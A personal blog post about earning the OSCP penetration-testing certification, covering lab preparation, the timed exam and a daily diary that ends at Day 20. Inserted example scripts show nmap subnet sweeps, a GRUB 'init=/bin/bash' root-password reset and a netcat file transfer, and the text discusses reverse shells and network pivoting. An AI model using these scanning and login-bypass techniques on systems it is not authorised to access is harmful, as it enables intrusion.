A detailed OSCP experience..


Summary

1/ TL;DR

2/ OSCP, why ?

2.1/ Feeling of slowing down..

2.2/ What was my initial level ?

3/ How did I prepare myself ?

3.1/ A long-term task..

3.2/ Have I achieved my goals ?

3.3/ Complex situation

4/ The decision

4.1/ Change of “rules”

5/ The beginning

5.1/ The panic

6/ My new life

6.1/ Exam date

7/ The end of the lab

7.1/ The emptiness

7.2/ Exam preparation

8/ Exam

8.1/ Day 1

8.1.1/ Last preparations

8.1.2/ Sleepless night

8.1.3/ 3.00am, start of hostilities

8.1.4/ 7.00am, user shell - 20 pts

8.1.5/ 8.30am, up against the wall

8.1.6/ 10.00am, root shell - 25 pts (pwn)

8.1.7/ 11.40am, user shell - 25 pts

8.1.8/ 1.25pm, root shell - 25 pts

8.1.9/ 1.57pm, root shell - 20 pts

8.1.10/ Break

8.1.11/ 2.36pm, back to work

8.1.12/ 6.00pm, 32 hours awake..

8.1.13/ 6.50pm, user shell - 20 pts

8.1.14/ 9.00pm, CTF break

8.1.15/ 10.00pm, back to work

8.1.16/ 2.30am, 42 and a half hours awake, time to sleep

8.2/ Day 2

8.2.1/ 9.15pm, the beginning of suffering

8.2.2/ 11.00pm, a little more effort

8.2.3/ 1.50am, report completed

8.2.4/ 2.05am, submission

9/ OffSec’s answer

9.1/ Looking for new challenges

10/ Thoughts record

10.1/ Day -2

10.2/ Day -1

10.3/ Day 1

10.4/ Day 2

10.5/ Day 3

10.6/ Day 4

10.7/ Day 5

10.8/ Day 6

10.9/ Day 7

10.10/ Day 8

10.11/ Day 9

10.12/ Day 10

10.13/ Day 11

10.14/ Day 12

10.15/ Day 13

10.16/ Day 14

10.17/ Day 15

10.18/ Day 16

10.19/ Day 17

10.20/ Day 18

10.21/ Day 19

10.22/ Day 20

10.23/ Day 21

10.24/ Day 22

10.25/ Day 23

10.26/ Day 27

10.27/ Day 28

10.28/ Day 29

10.29/ Day 30

11/ I salute the courage of the survivors!

TL;DR

When I got access to the OSCP lab, I had 6 months of experience in pentesting. I had also been training in my free time for 8 months to achieve my goal (getting the OSCP). I took 30 days of lab access in August. I scheduled my exam for October 6 at 3:00 a.m.

Between the lab and the exam, I continued to train through bug bounty and hackthebox.eu. On D-Day, I obtained 70 pts on the exam and was able to submit my report on time. A few days later, OffSec told me that I had obtained the OSCP :)

OSCP, why ?

Offensive Security Certified Professional (OSCP) is the most popular Offensive Security certification. It stands out for the technical, hands-on nature of its exam. In addition, candidates are immersed in a realistic virtualized environment. Since I started my studies in computer security, I have dreamed of obtaining this certification.

At the end of 2017, I set myself the goal of succeeding in the OSCP by the end of 2018.

Feeling of slowing down..

I had a fairly steep learning curve in 2017 and until early 2018, but I had the feeling that I was no longer making as much progress as before. Yes, I was getting better, but not as fast. I needed to restart the engine, and I found in the OSCP the motivation and inspiration to learn a lot of things very quickly.

What was my initial level ?

When I started the lab, I had 6 months of experience in pentesting. In other words, an obvious lack of experience. Of course, my activities with Apéri’Kube and my personal learning made me feel pretty confident about this certification. Otherwise.. I probably would have waited before attempting the OSCP.

I had discussed it with my apprenticeship supervisor (Marc Lebrun <3); attempting this certification was clearly ambitious considering the experience level of the pentesters who usually take on the OSCP.

I also read a lot of write-ups (like this one :P) to understand the difficulty I had to overcome. Some excelled without much experience, others with a lot of experience failed and retried several times, etc. It's hard to point to one factor, but stress management, time and fatigue probably play a role.. Nevertheless, among the “least experienced”, I noticed one undeniable common element: organization.

How did I prepare myself ?

It's the beginning of January 2018 and I want to take the OSCP in August by taking 30 days off. Say what? 30 days?! :D Yes, I used all my paid vacation (yeah, in France we have paid vacation.. :)) and gave up a week of salary.. But at least I could focus solely on my main objective. In order to feel ready when the training started, I prepared an 8-month schedule to train in my free time. These 8 months didn't simply consist of root-me.org or hackthebox.eu, but also of reviewing things I didn't feel particularly good at, whether networking, sysadmin, etc. I prepared a VM, prepared cheatsheets (in CherryTree) and trained on root-me.org and vulnhub.com. In the end I used hackthebox.eu very little, which was a mistake.

A long-term task..

The advantage of an 8-month plan is the possibility of readjusting activities according to delays, the learning curve, etc. The plan therefore evolved a lot; it keeps a running thread but also records the achievements.

As with any project, it is essential not to set objectives that are too big, and to break them down into many small tasks. This makes it possible to monitor progress but also to maintain morale more easily. It is indeed more satisfying to end the day by telling myself I reached my goal, rather than chasing the clock against objectives that are too broad. My main source of inspiration was this pentester (https://scriptdotsh.com/index.php/2018/04/17/17/31-days-of-oscp-experience/).

Have I achieved my goals ?

Obviously not :D I was constantly reorganizing the schedule to lighten it as I fell behind. Nevertheless, I had achieved a large part of my initial objectives. Still, I kept wondering if I had the level to hope to succeed.

Complex situation

The OSCP represents a significant financial cost, even with the minimum access (30 days). So for a long time I faced this dilemma: “Eat pasta for a few more months and try the OSCP, or simply give up on the idea of the OSCP.”

The decision

Well, you understand, I ate pasta.

So I contacted Offensive Security to register for the certification. They warned me, given my experience and the difficulty of the training.

Offensive Security provides you with a VPN configuration so that you can test the connection to their servers and confirm that it is of sufficient quality to carry out the training.

My decision was already made: bring me the bill, please.

The US dollar rate varies slightly, so count on about 700€ for 30 days of lab access. For reference, 60 days ~= 870€ and 90 days ~= 1000€.

Once the payment has been made, there is no going back.

Change of “rules”

Shortly afterwards, Offensive Security announced the introduction of proctoring during exams in order to limit cheating attempts. So we're talking about 24-hour video surveillance and screen sharing via a TeamViewer-like solution. This will most likely bring you more problems, such as:

_ There's an obvious privacy issue: you don't see your supervisor, but you and your family are constantly observed by various people. Call me paranoid, but nothing prevents anyone in these circumstances from going beyond their supervisory role..

_ Will my current computer (not necessarily at its best) be able to sustain a TeamViewer stream for 24h while constantly attacking machines?

_ Will I run into network problems during my scans?

_ Will I have to buy pants for the occasion?

Luckily, I had paid before the change of “rules”, so I avoided proctoring on my first attempt. On the other hand, if I failed, I would have to buy a retake ($60) and would therefore have to accept the new rules..

I asked Offensive Security if I could get a refund under these conditions, because I didn’t want to be proctored. OffSec answered me this:

offsec answers

So I had to succeed on my first attempt if I didn’t want to be monitored.

The beginning

My thoughts record is available at the end of the article; I wanted to keep a record of my feelings day after day to be able to see the change in level and rhythm, and also to laugh about it after the lab :D

It turns out that this “diary” conveys this experience much better than I could through these many paragraphs… So I'm giving it to you, without a filter.

However, I will continue my story in a condensed way to provide a view with more perspective.

It is July 29, 2018, and my access to the lab is activated. I first decide to download all the content provided, go through it, and start active network reconnaissance in the background… To my great surprise, the initial network (let's call it “public”) is very large: my scans show me about 40 machines! So while I was going through the material provided, I ran complete scans of the machines present to avoid wasting time.

First observation: the documentation provided is long, precise and full of exercises! To get the famous 5 bonus points you have to do all the required exercises (about 40) and write up 10 machines exploited with different methods. If everything is correct, the 5 bonus points are added to your exam score.

Clearly, with 30 days, I preferred to focus on the lab rather than on the exercises in the hope of getting the 5 bonus points.

I also had to prepare my move back to my family's place (on the other side of the country, an 8-hour drive). So I kept scans running while I familiarized myself with the documentation provided and adjusted my methodology and tools accordingly.

The next day, once I arrived at my family's house, I finished the full scan of the public network.
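An added example (the author's own scan scripts are never shown in the post): one way to run the kind of staged sweep described above from a POSIX shell. The first pass finds live hosts on the range, then a full port plus version/script scan of each live host is started in the background so you can keep reading the course material while it runs. The subnet 10.11.1.0/24, the output directory and the nmap options are assumptions; the parsing follows nmap's greppable (-oG) format.

```shell
#!/bin/sh
# Staged sweep of a lab subnet (added example; not the author's scripts).
# Pass 1: quick top-ports scan of the whole range to find live hosts.
# Pass 2: full TCP port + version/script scan of each live host, in the background.
# Assumptions: subnet 10.11.1.0/24, output under ~/oscp/scans, nmap in PATH.
set -u

NET="${NET:-10.11.1.0/24}"
OUT="${OUT:-${HOME:-/tmp}/oscp/scans}"

# Hosts marked "Status: Up" in an nmap greppable (-oG) file, one IP per line.
live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }' "$1" | sort -u
}

# Open ports of one host from a -oG file, as "port/proto" pairs separated by
# commas, e.g. "22/tcp,80/tcp". Prints an empty line if the host has none.
# -oG port fields are: port/state/proto/owner/service/rpc_info/version/
open_ports() {
    awk -v h="$2" '
        /^Host:/ && $2 == h && /Ports:/ {
            sub(/.*Ports: /, "")
            sub(/[[:space:]]*Ignored State:.*/, "")
            n = split($0, p, /, /)
            for (i = 1; i <= n; i++) {
                split(p[i], f, "/")
                if (f[2] == "open") out = out (out ? "," : "") f[1] "/" f[3]
            }
        }
        END { print out }' "$1"
}

# Run both passes and print a one-line summary per live host.
sweep() {
    mkdir -p "$OUT"
    # No -Pn here: "Status: Up" should mean the host answered host discovery.
    nmap -n --top-ports 100 -T4 "$NET" -oG "$OUT/sweep.gnmap" >/dev/null
    for ip in $(live_hosts "$OUT/sweep.gnmap"); do
        mkdir -p "$OUT/$ip"
        nmap -n -Pn -p- -sV -sC -T4 "$ip" -oA "$OUT/$ip/full" >/dev/null 2>&1 &
    done
    wait   # all per-host scans finished
    for ip in $(live_hosts "$OUT/sweep.gnmap"); do
        printf '%-15s %s\n' "$ip" "$(open_ports "$OUT/$ip/full.gnmap" "$ip")"
    done
}
```

Run `sweep` once the VPN is up; the two parsing functions work on any -oG file, so they can be reused on the exam's scans. If ICMP is filtered on the target range, add -Pn to the first pass and rely on `open_ports` being non-empty rather than on "Status: Up".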

It was a special moment: I only see my family very rarely, and yet, barely arrived, I was already at work in the lab. I don't think my family expected this scenario, even though I had warned them that I was taking an important certification haha :D

The panic

Very quickly I found myself facing enormous difficulties in this vast environment. I didn't know where to start, nor even whether the machines I was attacking were exploitable in their current state or whether I first had to compromise another machine at the other end of the network to hope to reach my initial target..

I realized that I was not ready for this certification despite all the work I had done beforehand, and I was starting to get demoralized. I can't count the number of times I relied on my girlfriend to cheer me up..

My new life

Now I live OffSec: I eat, drink, talk and sleep thinking about this lab and the exam that comes with it.

My work rhythm varies from 12h (short day) to 18h (long day); an honest average of the time spent in the lab would be 15h per day, or 450 hours in the lab over 30 days..

Yet around me life goes on; I see my family going to bed and getting up. I open a can every 3 hours.. Great diet, I recommend it :D

I learn so much in this lab that I become addicted to it. The (aging) environment is nevertheless realistic; OffSec has done a lot of work on the interactions between users to reproduce a business scenario as closely as possible. There is so much to analyze and recover on the machines once they are compromised that at the beginning I spent 10h on the post-exploitation phase. Once I had fully integrated the post-exploitation methods, I still spent 3 hours on it.

These post-exploitation times may seem frustrating, but they are necessary if you don't want to end up like the many people who come to the Offensive Security forum to ask for clues about the elements they have missed.. It is important to understand that you will be dealing with about fifty machines spread over 4 networks. When you need specific credentials or potential passwords from an Excel file, etc., you can only blame yourself if you have overlooked the post-exploitation phase.

You will then have only two solutions left:

_ Ask for help on the forum and get trolled.

_ Go back to the previously exploited machines, hoping to find what you missed without knowing if you are looking on the right machine..

So do your post-exploitation seriously.

Exam date

Initially, I wanted to schedule my exam before the end of the 30-day lab (because I didn't know how long it would take to get a stable Internet connection in my new flat when I returned). Unfortunately, and fortunately for me, I couldn't get such a date because the first available slot was 40 days away! So check availability very early to set your exam date, as many people are taking the exam.

The first slot that suited me (a weekend, Saturday at 3am) was October 6, more than 30 days after the end of the lab..

The end of the lab

So I have just spent 30 days doing pentest at a rate of 15 hours a day. I know all the Windows and Linux post-exploitation commands by heart. I apply my methodology like a machine, four to five times faster than at the beginning. I can quickly identify the “pitfalls” placed there to waste our time, and I identify and implement exploits at high speed.

I learned so much; I could never have imagined reaching such a level after only 30 days.. However, I still don't feel ready; I still have a lot of things to prepare to tackle the exam “calmly” a month later.

The emptiness

The end of the lab meant the end of a large part of my life's activities. I started going in circles, counting the hours; I missed the lab! Nowhere else did I find its equivalent; everything seemed so meaningless.. :D I can't stand CTFs anymore, which are so unrealistic most of the time. I have come to avoid this kind of event.

Exam preparation

So I have one month left to prepare my machine, review my methodology, and continue to learn and practice to keep my automatisms sharp.

My favorite playground became bug bounty and hackthebox.eu, which gave me quick access to environments on which I could train.

I continued to prepare in this way until D-Day. It was only the day before that I finally felt really ready: I didn't know what else to do to prepare for this exam.

Exam

Day 1

Last preparations

I prepare my shells, the scans are ready to be launched on the targets, and I'm only waiting for one thing: the OffSec email with my exam VPN configuration! I had set up alarms on my phone (which I still keep as a memento):

Saturday:

_ 2.03am “OSCP Alarm Clock”

_ 7.45am “1 machine pwn”

_ 12.30pm “2 machines pwn”

_ 5.15pm “3 machines pwn”

_ 10.00pm “4 machines pwn”

Sunday:

_ 2.40am “5 machines pwn”

Monday:

_ 2.30am “Hurry 10min report”

This allowed me to keep track of time in a reassuring way; I knew whether I was ahead or not without getting tired and distracted.

I also set up OBS to record the whole 24-hour exam. I expected to forget one or two screenshots for the report and wanted to be able to go back to the video to grab the moments I needed!

Sleepless night

That was without counting on the unusual excitement of the short night before the start of the exam.. I couldn't sleep, so unfortunately I had a sleepless night.

3.00am, start of hostilities

So I receive my VPN configuration and hasten to attack the machines in order. I perform my complete reconnaissance of all the machines while attacking one particular machine.

I quickly spot the 25 pts pwn machine and decide to keep it in reserve to cheer me up (“given” points if you are clear on the methodology to use, which was my case).

So I review the other 4 machines.

7.00am, user shell - 20 pts

I get a first user shell on a 20 pts machine; I couldn't get into the other 3 machines. So I persist in getting root on this fourth machine, which is almost finished.

8.30am, up against the wall

I can't find a way to achieve privilege escalation on this machine and am starting to feel frustrated. 5 and a half hours gone, the first alarm has already sounded, so I am late, yet I still don't have a root.

So I decide to attack the 25 pts pwn machine to bank those 25 pts and cheer myself up while clearing my head.

10.00am, root shell - 25 pts (pwn)

Even though I take the time to take absolutely all the screenshots I might need for the report, I manage to get a root shell on the pwn machine pretty quickly.

So I am still missing 45 pts (1 machine at 25 pts and 1 machine at 20 pts).

I decide to focus on the last 25 pts machine, whose initial entry point I absolutely couldn't see during my first pass.

11.40am, user shell - 25 pts

After about fifteen minutes, I discover my entry ticket for a user shell. However, the exploitation is not trivial and the target machine seems to be exotic. I manage to get a user shell 1h30 after the initial discovery. The exploitation was rather complex.

So I focus on the privilege escalation part of this machine.

1.25pm, root shell - 25 pts

I quickly spot something suspicious and dig in that direction. The privilege escalation is a bit of a puzzle, nice, but a bit slow to achieve.. Anyway, I get root access on the machine and the associated 25 pts at 1:25pm!

1.57pm, root shell - 20 pts

I now have 50 pts and a user shell on a 20 pts machine… That would be ideal, wouldn't it? I go back to the privilege escalation phase on this machine. Having cleared my head allowed me to look at the machine from a different angle. So I resumed the analysis of the machine's elements and noticed something potentially interesting.. I test it, and at that very moment I knew it was the jackpot!

So I set up the exploit and that's it.. I have the coveted 70 points after 10 hours and 57 minutes.

Break

Of course, it's excitement! All these months of work have finally paid off! Like a kid, I tell my girlfriend, my parents and my friends that I have the points, and take the opportunity to take a break.

2.36pm, back to work

I had so much adrenaline; I was tired but couldn't bring myself to go to sleep despite having been awake for more than 28 hours. I wanted to get the 100 pts!

So I went back to work directly on the last two machines (20 pts and 10 pts).

6.00pm, 32 hours awake..

3h30 later, I really start to have difficulty thinking; I fill up again with caffeine and fast sugars and stay on track..

I have an entry point on the 10 pts machine, but I'm not thinking clearly and can't take advantage of this vulnerability to get root access on the machine. I rightly suppose that if the machine is worth 10 pts, it is because there is no privilege escalation to perform. That doesn't mean getting these 10 pts is “simple”.

6.50pm, user shell - 20 pts

Going back to the 20 pts machine a bit, I manage to see an element that had been under my nose from the beginning, but that fatigue had prevented me from seeing easily… It was really ridiculous: it had taken me 6 hours to see a crucial element present under my nose from the beginning!

Anyway, I had just got a user shell on the 20 pts machine.

So I persist on this machine. I quickly identify the vulnerability and look at the exploit to implement.

I WASN'T READY, I REALLY WASN'T. It was necessary to chain 4 exploits together, documented by advisories of 10-15 pages. I tried again and again, but it was too much effort for my level of concentration and thinking with so much fatigue.

9.00pm, CTF break

1h later, I decide to take my mind off it, as I wouldn't have been able to sleep anyway.. And as it happens, a CTF has just started, so I decide to take a look.

10.00pm, back to work

After an hour, I get tired of it, take my caffeine doses again and get back to work.

I can't put the pieces of the puzzle together on the 20 pts machine. As for the 10 pts machine, I adopted a method that I think was the right one. Since there is no privilege escalation, and I'm supposed to get root access.. there aren't 15,000 possibilities either; from my reconnaissance, I identify 2 serious candidates for exploitation leading to root access.

Both services are “exploitable”, but I can't really take advantage of one of them under these conditions, even when using my one Metasploit shot against this machine.

2.30am, 42 and a half hours awake, time to sleep

4h30 later, the end is near (2.45am), and I lay down my weapons. So I go to bed with the disappointment of not getting my 100 pts, probably because I didn't force myself to sleep after getting my 70 pts.

So I got 70 pts + a user shell on a 20 pts machine.

I set an alarm for 12.30pm.

Day 2

The alarm rings; it's complicated to get up :D So I have to write the report. I take the time to wake up, eat, etc. I had everything but a desire to write this report, and it took me a long time to get started. When I decided to look into it, it was 4.00pm.

The report has to be submitted before 2.45am; quite confident, I tell myself that this will be more than enough.

I therefore calmly review the expectations regarding the report and start writing based on the OffSec template. I preferred to use the template since it has been validated by Offensive Security and meets their expectations, thus reducing the chances of missing something.

But a problem arises quickly: I don't know if I should document all 5 machines (including those I didn't compromise). The question is whether I leave them out, simulating a “perfect” intrusion report, or whether I present them, indicating in the report that the machines have flaws that could not be fully exploited during the audit.

I therefore decide to contact Offensive Security by email and continue the report. OffSec is again very responsive and tells me that I decide what I want to present to them.

My choice is therefore to present only the 3 compromised machines, and if I really have time to document the other 2 machines, then I will do it.

So I really start the technical part of the report at around 5.30pm and bend to the OffSec format, i.e. a write-up of several machines within a pentest report. So it's not a pentest report, but rather a CTF write-up in disguise.

9.15pm, the beginning of suffering

I have just detailed a 25 pts machine (not the pwn machine, which is the longest to detail). It's 9.15pm, and I'm beginning to understand that it's going to be complicated to meet the deadline for the 5 machines. I don't stop and keep going.

11.00pm, a little more effort

A little less than 2 hours later, I finish the explanations for the 20 pts machine. I have 3h40 left to submit my report and I still have the 25 pts pwn machine (the longest) to explain.

1.50am, report completed

Having gotten used to the writing method on the two previous machines, I manage to complete the report at 1.50am. So I reread all the submission requirements to make sure I don't miss anything so close to the goal.

I prepare the email, upload the report to the dedicated platform and retrieve the associated link.

I read the email again and again.

2.05am, submission

At 2.05am, everything seems to be in order; I decide to submit the report and rejoin my loved ones, who are asleep without news.

OffSec’s answer

2 days later, while I was attending a Threat Intelligence course at school, I received the answer from Offensive Security indicating that I had passed.

glory

I had so much adrenaline, I was almost out of breath; I had succeeded :D

Looking for new challenges

I have often been asked what I plan to do after this certification. The “obvious” answer is the OSCE (Offensive Security Certified Expert), which focuses on exploit development and is considered more difficult than the OSCP.

This is obviously an objective, but not a current one. I have many other personal learning projects to complete before I can tackle that certification :)

Even today (4 months later), I still have trouble realizing that I have obtained the OSCP. A certification that I can only recommend to all pentesters who are wondering about it.

Thoughts record

I mentioned it at the beginning of the article: below you will find my thoughts record from 2 days before the OSCP lab until the last day of the lab. I have deliberately not filtered anything, to show you that it is not simple (as some articles might suggest once the certification is in hand). You will also see the evolution of skills in terms of rhythm/confidence.

I hope this long write-up has helped you learn more about this certification.

NB: The CEH (or any other paper certification) is in no way comparable to the OSCP; as you have understood, here you don't tick boxes on an MCQ.

Day -2

On July 27, I leave my work behind for a month of “holidays” (trying hard for the OSCP). In parallel, I have personal problems, I'm starting to lose motivation, and I'm getting a little nervous about the OSCP. Even more so since I learned that I have to succeed on my first attempt if I want to avoid the new proctored exam! I paid for the OSCP around July 15, so I'm not concerned by the surveillance for my first attempt, but if I fail and retake it, I will have to comply with the requirements put in place for the proctored exam. I have a lot of concerns about this new exam, because I really don't want to be spied on for 24 hours and I'm afraid I might have connection problems or hardware problems with screen sharing + Skype or something else.. My laptop is at the end of its life.

Day -1

On July 28th, I woke up in the same mood. I have to clean my flat and leave it on the morning of July 30th to go back to my family, ~700km away. I am 10 hours from the official start of my OSCP journey. I still have a lot of things to clean in the flat, then I will rewrite my network scan scripts to be efficient. I already plan not to do the exercises since they are only worth 5 points and I will have about 25 days of OSCP training before trying my luck! Yes, I will not take the full 30 days before trying the OSCP because I have to leave my family's home sooner than I would like. My next flat is waiting for me 800 km from their home.. And since I don't want to take the OSCP exam on a connection I've never used, etc., I will do my best in 25 days to succeed at the OSCP on my family's connection! I try to motivate myself as best I can in many ways => sugar, sport, music; the mind must be on my side. I don't know how many machines there are on the OSCP networks; I think between 50 and 90 based on the many write-ups I've read.. I want all the roots! I have to root between 50/25 = 2 machines/day and 90/25 = 3.6 machines/day in the worst case.

Day 1

July 29, it's 2.00am, my OSCP journey begins! Let's download the course material first! I haven't finished preparing for the OSCP (scripts are being written and my machine configuration is not finished), so I finish them while downloading the videos (which takes me about 2h30). The scripts are finished, 80 minutes of download left; I looked at the OSCP forum, which seems to contain a lot of clues. ._. I hope I won't need it! There's a platform to crack LM hashes. It is said that if you can't crack a hash using the pot file and wordlists embedded in Kali, then this is probably not the right method. I'm going to sleep a bit to make use of this idle time before I start the videos. It's noon, I start; I go through the videos and skip the ones I'm sure I already know well. While the videos are playing, I access the lab to perform basic reconnaissance with my network scripts. 8.00pm, I'm done with the videos and most of my organization; I've done many network scans, and I'll continue until I'm done with all the machines on the public network! I don't want to miss anything. While the network scans are in progress, I'll try to attack my first target! It's 1.00am, I worked on 3 machines and couldn't access any of them. I'm definitely behind schedule if there are 90 machines; I have to be more efficient. The OSCP is really difficult. I'm not sure I've gotten used to its logic yet. I hope that my organizational work will pay off in the next few days. Tomorrow I'll be driving all day, so I'm not really sure I'll be able to root a single machine..

Day 2

On July 30, I'm already exhausted; I have to leave my flat and I drive all day in hot weather. 6.00pm, I've arrived; 10.00pm, OSCP, I'm back! I finished my full network reconnaissance. And by going back to one of the 3 machines I had already tried, I got a reverse shell on one of them, limited but still.. My first OSCP shell! Now I have to do the privilege escalation, but it's time to sleep!

Day 3

July 31, wake-up at 10.00am, family relaxation until 1.00pm. Then OSCP until 2.00am. I struggled so much with a Windows machine; I am a little used to Windows, but I had huge difficulties with the privilege escalation part. I also learned from what I was doing wrong; it took me 8 hours+ to understand where I was wrong. Then I quickly rooted the machine, the 1st root shell after about 2 days. It was so hard that I thought I couldn't do it :p I'm so late on my goals.. After getting root access, I got all the information I could and found some interesting things; I guess I'll need them later.. I also discovered that the machine I rooted was duplicated, so 42 machines out of 44 remain in the 1st network. It's time to sleep and do better the next day.

Day 4

August 1st, I got root on 2 machines, so far my best day. I have already spent 4 days in the lab and I have only got root on 3 machines. On the other hand, I have done a complete reconnaissance, and I am also conscientiously doing the post-exploitation to get as much information as possible; I hope I will get root on 3 machines per day from now on.. I have already seen improvements since the beginning of this certification. I'm learning a lot of things.

Day 5

On August 2nd, I got 2 machines, but I panicked because my VM had a problem and my last snapshot was 3 days old.. I almost thought I'd have to redo my last 4 rooted machines.. However, I found a way to repair my Kali: edit the GRUB entry, put rw instead of ro and add init=/bin/bash.

Then I booted in recovery mode and reset my root password, because I couldn't type my 20+ character root password on a QWERTY layout.. Then, as I couldn't repair my damaged packages (the last apt-get upgrade probably sealed my fate), and as in recovery I couldn't copy my files into my shared host folder, I transferred the backup files using netcat :D Silly me, but it ended well ><
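The recovery described in this entry, as an added illustration (these are not the author's commands): boot the VM with init=/bin/bash from the GRUB menu, reset the root password, then ship the notes off the VM with netcat and verify the transfer with a checksum, because a netcat stream that gets cut off fails silently and you would only discover the truncated archive when you need it. The interface name, port, paths, host IP and the netcat flag flavour are assumptions.

```shell
#!/bin/sh
# Rescue a Kali VM that no longer boots cleanly and get the lab notes out of it.
# Added example for this article, not the author's commands; interface name,
# port, paths and netcat flag flavour are assumptions.
set -u

# Step 1 (typed at the GRUB menu, not in a shell): select the Kali entry, press
# "e", find the line beginning with "linux", replace "ro" with "rw", append
# " init=/bin/bash" and boot with Ctrl-X. You land in a root shell with the
# root filesystem writable and no password asked.
#
# Step 2 (in that shell): the console keymap is US QWERTY, so set a password you
# can actually type, then bring the network up by hand (no init, no services):
#   passwd root
#   ip link set eth0 up && dhclient eth0          # eth0 is an assumption
#
# Step 3 (on the receiving host, started first):
#   nc -lvnp 4444 > kali-backup.tgz               # traditional nc / ncat flags

# Build the tarball and print its SHA-256: this is the value you compare with
# on the other side, because a netcat stream that is cut off fails silently.
pack_backup() {   # pack_backup <dir> <out.tgz>  -> prints sha256 hex digest
    tar czf "$2" -C "$(dirname "$1")" "$(basename "$1")" || return 1
    sha256sum "$2" | cut -d' ' -f1
}

# Step 4 (on the broken VM): push the tarball to the listener.
send_backup() {   # send_backup <file> <host> <port>
    nc -nv "$2" "$3" < "$1"
}

# On the receiving side: 0 if the received file matches the digest read out on
# the VM, 1 otherwise (truncated or corrupted transfer: do NOT trust it).
check_backup() {  # check_backup <file> <expected-sha256>
    [ "$(sha256sum "$1" | cut -d' ' -f1)" = "$2" ]
}

# Unpack a verified backup into a destination directory.
restore_backup() { # restore_backup <file.tgz> <dest-dir>
    mkdir -p "$2" && tar xzf "$1" -C "$2"
}

# Typical session:
#   VM:   digest=$(pack_backup /root/oscp /tmp/notes.tgz); echo "$digest"
#         send_backup /tmp/notes.tgz 192.168.56.1 4444      # host IP assumed
#   host: check_backup kali-backup.tgz "$digest" && restore_backup kali-backup.tgz ./recovered
```

Read the digest off the VM console (or photograph it) before sending; if `check_backup` fails on the host, re-run the transfer rather than trying to repair the archive, since gzip will happily decompress the intact prefix of a truncated file and you would lose the tail without any error from tar.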

Day 6

On August 3rd, I literally spent 12-13h on a Windows machine. I managed to get a shell on it after the first 8 hours, but I couldn't find a solution for the privilege escalation part; I guess I'm missing the password of the admin of another machine that I haven't yet found a way to compromise. Sad day, no root :(

Day 7

On August 4th, I spent 3 hours trying to get root on yesterday's machine.. But I didn't succeed, so I moved to another machine, got root in 1h30, then another one, got root in 4h30. 6h later I got yet another root :) Pretty cool, I've got root on 8 machines in 6 days.

Day 8

August 5, only 1 machine today, but I'm pretty happy, because I saw a lot of people fighting for 1-2 weeks against it! The things I learned from the beginning helped me a lot to get it quickly :) Then I moved to another machine.. I didn't realize at that moment that I was going to suffer so much.. The first pwn machine I've ever seen! I used to think that yeah, the OSCP contains pwn, but it could be a simple buffer overflow.. and you might imagine that they use a service like the ones you can find in the Brainpan VM. This is NOT the case. They lead you to a more common situation. The idea remains the same: modify an exploit to adapt it to your case, and it is a little “simple” compared to the pwn challenges you can find in CTFs. However, when you are not comfortable with pwn, you really start to struggle :‘) I did the reconnaissance of this machine, I know my target. But I'll do it after a little rest.

Day 9

August 6, this day is by far the most successful! I tried to understand how I could get root on the pwn machine. After a few hours, I was fed up and also a little tired; I had to clear my head, so I went back to a machine I had left some time ago. I succeeded in gaining root access, then I extracted the information. This day was great: I got root on 3 machines and I took a lot of time to do a good post-exploitation once NT AUTHORITY\SYSTEM on Windows. I learned a lot of things and I prepared a cheatsheet to do it again, faster, next time! Currently, I have got root on 13 machines in 8 days.

Day 10

August 7th, it was misery. I struggled all day on a machine and finally managed to get root at the end of the day. I'm exhausted..

Day 11

On August 8th, I was out of shape. I tried several targets looking for an easy win, but I didn't find any, so I came back to a machine I had left before and spent the rest of the day there. No root today :( Going to sleep with the feeling of not being good enough.

Day 12

August 9th, today was one of my craziest days! I first managed to get root on yesterday's machine, and on another one the next hour! Then, soon after taking the first target that was in front of me, I came across the so famous machine.. "Pain". I was there like: wow, am I really ready for that? I've heard a lot of stories about it, that it's one of the hardest machines in the lab! Nevertheless, I tried, enumerated everything I could, and quickly found the entry point; 1h30 after the beginning, I got my reverse shell! \o/ The privilege escalation part was difficult, I spent 10 hours on it, trying almost everything I could. I won't spoil your fun for when you eventually start the OSCP, but I must say that it was both painful and extremely satisfying! I felt like one of those SPARTA guys! 8)

this is sparta!

Day 13

August 10, review after 12 days of lab. I have access to another network, I have control of the AD, I survived "Pain", and I have a total of 16 root accesses. At the end of the day, I had root on 19 machines :) I calculated that I can almost finish the lab if I get 3 boxes/day from now on.. #ChallengeAccepted

Day 14

On August 11th, first day facing my new objective, I got root on a machine in the first hours and then.. I started a new one :') When I got the reverse shell on it 2 hours later, I realized it was "Gh0st"! At that point, I knew it would probably be complicated to get rid of it quickly. 10 hours later I had my root shell on it \o/ I didn't have time to do a third box today, so I failed the objective, but it's kind of a good day with Gh0st down!

Day 15

August 12, it was a very good day. I wanted to recover the missing box from the day before, and I got root on 2 machines in less than 3 hours, but then I fought against a particular OS on which getting a stable reverse shell with a proper tty is very complex.. I'm 15 days from the end, I have 23 root accesses.

Day 16

On August 13, after a few hours, I finally managed to put an end to this painful machine. I then quickly got root on 2 boxes; within 6 hours I had 3 more :) The rest of the day? Struggling against a single machine, exploring a rabbit hole for far too long.

Day 17

On August 14th, it took me 4 more hours to understand yesterday's machine and get root access on it.. Let's finally move on to something else. I'm now facing the "Humble" machine. It's 5.00am, and when I discovered what I was supposed to exploit I was like.. wut? Isn't that a trap? No, I'm on the right track! 9.00am, I went to bed; back at 2.00pm until 5.00am.. I still haven't been able to get the reverse shell.

Day 18

On August 15th, still struggling with Humble, I tried another machine I had left in my first days and managed to get root pretty quickly. I also got root on "FC4"!

Day 19

On August 16, back to Humble and back to hell.. Then everything suddenly became clear in my mind. It was so obvious, I don't know why I fought so hard.. After 30 hours I had my reverse shell on Humble, and 2 hours later I managed to get root! Wow :) I have Pain/Gh0st/Humble/FC4; now I'm going to tackle the missing one, "Sufferance", which I left behind! Then I will focus on getting access to the administration network! The rest of the day I was on fire: I got root on 4 machines. 18 days have already passed and I have 34 machines!

Day 20

On August 17, I started my day by trying to get root on Sufferance because it is the only one of the big 5 that I'm missing. But well, it was hell in there; after about 7 hours I felt like I wasn't getting anywhere. So I retreated and moved on.. The public network is starting to take too long, so I decided to enter the Admin network! My first target was the IT network. I spent the rest of the day fighting with new problems.. Network problems! Yeah, once you start going into another network, say hello to proxychains and long scans :)

I discovered sshuttle, it was so cool! If you are not familiar with this tool, YOU MUST TEST IT. It sets up a VPN-like tunnel between you and your target network through an intermediate machine, over SSH.. It's a hell of a lot faster than proxying everything! The only requirement is that the intermediate machine has python (2.3 or later) in its PATH, or that you are able to specify the path to it. So it won't work every time, but it's a good thing :)
